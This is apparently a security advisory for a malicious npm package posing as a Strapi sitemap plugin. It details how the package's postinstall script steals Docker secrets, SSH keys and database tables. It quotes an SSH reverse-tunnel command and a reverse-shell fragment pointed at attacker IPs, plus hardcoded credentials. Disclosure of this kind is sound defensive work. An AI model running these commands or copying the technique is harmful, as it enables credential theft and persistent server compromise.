VDB
GCVE-110-OSM-2026-1241
GCVE-110-OSM-2026-1241
Advisory PublishedCVSS 9.6/10
Masquerades as a Strapi CMS sitemap plugin. The postinstall script (13KB) performs multi-stage credential theft and persistent backdoor installation against Strapi production servers: (1) enumerates all Docker container env vars from /proc/1/root/var/lib/docker/containers/*/config.v2.json, harvesting any PASSWORD/SECRET/KEY/TOKEN/WALLET/PRIVATE/MNEMONIC values; (2) reads SSH private keys from /root/.ssh and all home directories; (3) connects to PostgreSQL with hardcoded credentials (user_strapi / 1QKtYPp18UsyU2ZwInVM) and dumps the core_store table (JWT secrets) and strapi_administrator table (admin bcrypt hashes + emails); (4) attempts to crack Elasticsearch at 65.21.203.242:9200 using passwords harvested from Docker configs; (5) launches a detached Python3 reverse shell to 144.31.107.231:4444; (6) establishes SSH reverse tunnels exposing PostgreSQL (VPS:15432) and Redis (VPS:16379) for persistent post-exploitation access. All data is exfiltrated via HTTP POST to 144.31.107.231:9999.
package.json declares 'postinstall: node postinstall.js'. postinstall.js (13KB) checks process.cwd() for TRANSFER/WINDOWS/MINGW strings and uname -s for MINGW/windows to skip sandbox environments. Reads Docker container configs from three candidate paths (/proc/1/root/var/lib/docker/containers, /data1/app/docker/containers, /data/docker/containers). Parses each config.v2.json to extract Name, Image, Env array, and State.Running. Filters env vars for PASSWORD/SECRET/KEY/TOKEN/ELASTIC/REDIS/DATABASE/WALLET/PRIVATE/MNEMONIC/SEED. Reads /proc/1/root/root/.ssh/id_rsa, id_ed25519, and all user home directory SSH keys. Reads all .env files under /opt, /data1, /home, /srv. Uses hardcoded PostgreSQL credentials (user_strapi/1QKtYPp18UsyU2ZwInVM) to query core_store and strapi_administrator. Spawns 'nohup python3 -c socket.connect((VPS,4444))...' as detached background process. Runs 'nohup ssh -fNR 15432:127.0.0.1:5432 -R 16379:127.0.0.1:6379 root@144.31.107.231 -p 22'. Probes Hetzner metadata API at 169.254.169.254. Scans 172.17.0.1-30 across ports 80,443,3000,5000,5432,6379,8080,9090,9200.
Weaknesses (CWE)
CWE-506Embedded Malicious Code
Risk Scores
CVSS 3.1
9.6/10
Critical · CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
Affected Products
| Vendor | Product | Versions | Platforms |
|---|---|---|---|
| unknown | strapi-plugin-sitemap-gen | 3.6.8 (affected) | — |
Explore Further
Investigate this vulnerability in the interactive console or download the raw GCVE record.